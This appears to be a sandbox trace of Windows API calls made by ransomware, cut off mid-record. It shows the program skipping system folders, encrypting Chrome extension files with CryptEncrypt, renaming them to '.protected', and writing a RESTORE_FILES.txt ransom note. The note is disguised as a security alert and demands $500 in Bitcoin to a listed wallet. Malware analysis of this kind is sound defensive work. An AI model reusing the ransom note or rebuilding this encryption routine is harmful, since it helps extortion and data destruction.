(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.134] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.134] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.134] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.134] CloseHandle (hObject=0x164) returned 1 [0079.134] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0079.134] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0079.134] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\RESTORE_FILES.txt") returned 156 [0079.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.135] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.135] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0079.136] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.136] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0079.136] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.136] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0079.136] CloseHandle (hObject=0x160) returned 1 [0079.136] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.136] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0079.136] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0079.136] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0079.136] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0079.136] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0079.136] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata") returned 139 [0079.136] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0079.136] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0079.136] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\*") returned 141 [0079.136] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0079.137] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.137] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.137] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.137] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.137] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.137] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\.") returned 141 [0079.137] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.137] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.137] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.137] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.137] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.137] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.137] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.137] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\..") returned 142 [0079.137] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.137] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.137] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.137] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Windows") returned -1 [0079.137] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files") returned -1 [0079.137] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files (x86)") returned -1 [0079.137] lstrcmpiW (lpString1="computed_hashes.json", lpString2="$Recycle.bin") returned 1 [0079.137] lstrcmpiW (lpString1="computed_hashes.json", lpString2="System Volume Information") returned -1 [0079.137] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0079.137] StrStrIW (lpFirst="computed_hashes.json", lpSrch=".protected") returned 0x0 [0079.137] lstrcmpW (lpString1="computed_hashes.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.137] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0079.137] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0079.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.138] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0079.138] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0079.138] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0079.139] StrStrW (lpFirst="computed_hashes.json", lpSrch=".rar") returned 0x0 [0079.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0079.139] StrStrW (lpFirst="computed_hashes.json", lpSrch=".zip") returned 0x0 [0079.139] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x160, lpOverlapped=0x0) returned 1 [0079.140] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffffea0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.140] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x160, lpOverlapped=0x0) returned 1 [0079.140] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.140] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0079.140] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0079.140] CloseHandle (hObject=0x164) returned 1 [0079.140] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.protected") returned 170 [0079.140] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.protected")) returned 1 [0079.141] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.141] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0079.141] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0079.141] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0079.141] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0079.141] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0079.141] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0079.141] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0079.141] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0079.141] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0079.141] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0079.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.141] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0079.141] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0079.142] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0079.142] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0079.142] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0079.142] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0079.142] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0079.143] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.143] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0079.144] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.144] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0079.144] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0079.144] CloseHandle (hObject=0x164) returned 1 [0079.144] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.protected") returned 172 [0079.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.protected")) returned 1 [0079.145] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0079.145] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0079.145] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\RESTORE_FILES.txt") returned 157 [0079.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.155] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.155] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0079.156] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.156] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0079.156] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.156] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0079.156] CloseHandle (hObject=0x160) returned 1 [0079.156] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0079.156] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0079.156] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\RESTORE_FILES.txt") returned 147 [0079.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0079.157] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction 